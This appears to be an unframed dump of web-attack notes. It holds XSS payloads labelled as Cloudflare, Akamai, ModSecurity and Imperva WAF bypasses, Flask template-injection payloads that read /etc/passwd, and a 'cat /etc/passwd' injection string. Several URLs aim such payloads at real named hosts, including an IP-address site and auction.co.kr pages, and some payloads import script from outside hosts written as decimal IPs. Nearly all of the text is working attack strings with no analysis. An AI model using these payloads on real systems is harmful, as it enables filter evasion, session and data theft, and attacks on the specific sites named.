https://medium.com/@mohdaltaf163/uploading-backdoor-for-fun-and-profit-rce-db-cred-p1-2cdaa00e2125 https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload cat+/etc/passwd &lt;svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"&gt;&lt;defs&gt;&lt;font id="x"&gt;&lt;font-face font-family="y"/&gt;&lt;/font&gt;&lt;/defs&gt;&lt;/svg&gt; 𝘾𝙡𝙤𝙪𝙙𝙛𝙡𝙖𝙧𝙚 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 &lt;img src=x onError=import('//1152848220/')&gt; &lt;img src=x onError=import('//3627734734/')&gt; http://3627734734 teste"&gt;&lt;javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash&gt;/*click me!#*/alert(document.domain) teste"&gt;&lt;javascript: onclick=location=tagName%2BinnerHTML%2Blocation.hash&gt;/*click me!#*/confirm`1` testtest&lt;a%20href="javascript&amp;colon;alert(document.domain)"&gt;testtest 𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 &lt;x onauxclick=import('//1152848220/')&gt;click 𝙈𝙤𝙙_𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 &lt;x onauxclick=import('//1152848220/')&gt;click &lt;img src=x onError=import('//1152848220/')&gt; &lt;uu src=@'@' onbigclick=import('//0a"&amp;nbsp;"0a0a?0a/')&gt;mou%09se&lt;|/uu&gt;:} &lt;svg/OnLoad="`${prompt``}`"&gt; Imperva Waf XSS ByPass : &lt;sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//&lt;/div"&gt; &lt;svg onload="alert(1)" &lt;="" svg="" https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://github.com/cure53/H5SC/tree/master/attachments https://130.211.16.246/www/EasyToBuy/ShareOfVoice?retailer='-onfocus=alert(document.domain)-' https://130.211.16.246/www/LearnFromTheShoppersVoice/ShoppersVoiceRetailerData?retailer= https://130.211.16.246/www/LearnFromTheShoppersVoice/ShoppersVoiceProductsData?category=&amp;header=Top%205%20Competitors&amp;label='-confirm(1)-' ?a=`+alert(document.domain);//&amp;x=%22oncut=%22eval(%27`%27%2bURL)' Python Flask SSTI Payloads and tricks * {{url_for.__globals__}} * {{request.environ}} * {{config}} *`{{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}` * {{self}} * request|attr('__class__') == 
request.__class__ == request[\x5f\x5fclass\x5f\x5f] &lt;img src="x" onerror="document.write(window.location)" /&gt; &lt;img src="echopwn" onerror="document.write('&lt;iframe src=file:///etc/passwd&gt;&lt;/iframe&gt;')"/&gt; https://memberssl.auction.co.kr/Common/CustomizedVerification/VerifyIdentityByCellphone.aspx?nrequestseq=132421452&amp;calltype=U&amp;nexturl=javascript:confirm(1);//%3freferType%3d%26url%3dhttps%253a%252f%252fmemberssl.auction.co.kr%252fFP%252fBabyPlus%252fSignupBabyPlus.aspx%26RequestSeqNo%3diac132421452%26callPageType%3dU%26certType%3dZ&amp;cancelurl=javascript:confirm(1);//%3freferType%3d%26url%3dhttps%253a%252f%252fmemberssl.auction.co.kr%252fFP%252fBabyPlus%252fSignupBabyPlus.aspx&amp;refertype=&amp;ispossiblecreditauth=Y https://memberssl.auction.co.kr/Common/popup/VerifyIpinPopup.aspx?mtype=I&amp;ctype=U&amp;next=javascript:confirm(1);// https://memberssl.auction.co.kr/Common/popup/VerifyIpinPopup.aspx?mtype=I&amp;ctype=U&amp;next=https%3a%2f%2fmemberssl.auction.co.kr%2fCommon%2fVerifyMainResult.aspx%3freferType%3d%26url%3djavascript:confirm(1);// </div>
  '"/&gt;&lt;img/src=` onerror=alert('name')&gt; mail'"/&gt;&lt;img/src=` onerror=alert('name')&gt;
